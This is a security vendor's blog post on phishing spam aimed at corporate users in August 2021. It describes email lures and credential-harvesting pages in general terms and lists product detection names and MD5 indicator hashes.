Trend of Phishing Spreading Through Spam Mails

AhnLab collects dozens of phishing spam mails from several clients daily. Phishing spam mails can be divided into two major types. The first type is using a fabricated e-mail from the get-go (e.g. asking to reply with personal information). The second type includes the address of the phishing website in the body of the e-mail, prompting the user to connect to it, or includes the script file of the phishing website as an attachment. This post will explain the characteristics of recent phishing attacks and the current state of damage from the second type phishing that must be blocked by security products.

When connecting to the phishing website address included in the body of the e-mail or to the attached HTML file through a web browser, the user is connected to a page that asks the user to enter personal information such as company account ID or password. When comparing such phishing pages of the past with normal pages, there were many elements that the users could be suspicious of due to the poor screen content, layout, and such. However, when compared with normal websites today, they are built to look almost identical, thus it is difficult for users to realize that their information is leaked even after entering their personal information.

There have been numerous attempts of such attacks targeting corporate users especially. Therefore, this post aims to minimize the damage from the attacks by introducing the characteristics of the attack type in detail.

Current State of Damage

1) Current state of client-reported e-mails

AhnLab receives around 10 to 30 reports of malicious spam mails daily based on one day of reports from XXX client.

2) Malware detection

In order to detect phishing malware, AhnLab uses various points to apply detection patterns. The number of cases detected in an actual client’s environment with only the newly-applied pattern in the month of August in 2021 is as follows: More than 5,400 cases of phishing malware were reported by around 1,000 clients.

5,420 Count 949 PCID

The pattern mentioned here is limited to a comprehensive detection method that can diagnose 1:N multiple files, not 1:1 single file. This means that the count detected above is the minimum number of cases, and if the cases that were detected with the previously-applied pattern were included, it is assumed that there would be much more damages caused by phishing malware.

Spam Mail

1) Example of spam mail

The following is one example of the spam mails collected from client XXX for the month of August 2021. Users who often receive e-mails from outside the company are likely to connect to malicious websites without a second thought. There has also been a case of spam mail disguised as an e-mail related to company infrastructure. Such e-mails often include the company name in the subject, sender, and body to easily earn trust, thus users must be vigilant.

Phishing Website

1) Example of phishing websites

The following is the screen users see when they connect to the phishing website address included in the spam mail or run the HTML file using a web browser. They commonly aim to steal a well-known service account information or user’s company account. Many pages are built intricately from their title to the background image so that they can be mistaken for normal websites. Some of the phishing websites these days have the effect of page redirection taking some time as if it is a verification process.

AhnLab’s Response

Phishing script files and the action of connecting to phishing websites are the targets for blocking. AhnLab’s products use the aliases below. Only a few of the aliases are listed as they are continuing to be updated.

Phishing/HTML.Generic.S1644 (2021.08.25.02)
Phishing/HTML.Generic.S1643 (2021.08.25.02)
Phishing/HTML.Generic.S1642 (2021.08.25.02)
Phishing/HTML.Generic.S1641 (2021.08.25.02)
Phishing/HTML.FakeExcel.S1632 (2021.08.23.02)
Phishing/HTML.FakeExcel.S1630 (2021.08.19.02)
Phishing/HTML.Redirect.S1621 (2021.08.13.02)
Phishing/HTML.Redirect.S1620 (2021.08.13.02)

IoC

04ef8dcac0699cc98ee2e3f63ec60d15
0d2dca7ee968e7f263b2edd0731c18af
10a2fd82ae872fa150256eb3079af6f2
1b09114f2475443c443d509f1f37a7e9
1b481f5e62271c12c5e64c2ddbbd7f34
2c63574a6f425b899d969e425b021a34
2f0a0327e3ecae4bb909c37789940631
2fea75124e383b6204fe400a55a75f42
3ca2e93ce5646b5edbcd26a83f0c1076
414fb3d9224e9a3d2a8497cc21e35c4c
438e28f1250a95f67b5da709b0b0b873
53fa4af4cdedc8714c633e79f8d27f8c
59364f402c8ab5a1fe81da3298590ba9
66bde819e1485d8acca63ff6db30a32d
6ddf37c10bcedbc23bfbb4cace71f654
76eab31f38a1bfb1b2a6358d66676d90
82c7f1291cd84e74e48b800c894a87eb
85663d428c4f4faf7ab9da021a029454
85ae5c2876b7e6059f73eb4f9febb491
a316bb6ed42203d53c69f6b864a93219
a62011445bca1f4049088e1cc54a7655
a9d205242228843b808cc4b26a66381c
aea404847a1409850a38b0a23b4f381f
b842f98ca06aa29b430c848c9f90deda
c7f10beb8f19ad0965741cdcab58cfb0
cc03ac89055c7a092d6cadea1f9f127c
d25a73691950635505662fa4c183e315
d2aca148eb7196cc948c5e007c477db1
d9ee2d64d89b61aab421254c6c37908b
e52d0f9b9c0f8d3d67af6215960d3deb
f0d841b0051a6b6b4b63cdc8794460a6
f253811aad38d8c6885b715693a358b1
f559eb1b80519958642229822eff4573
f5ea4adde22ef1f9a19dd210e2efd705
f8dfadd297b77cb16920a88a80c3219b

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

0 0 votes
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments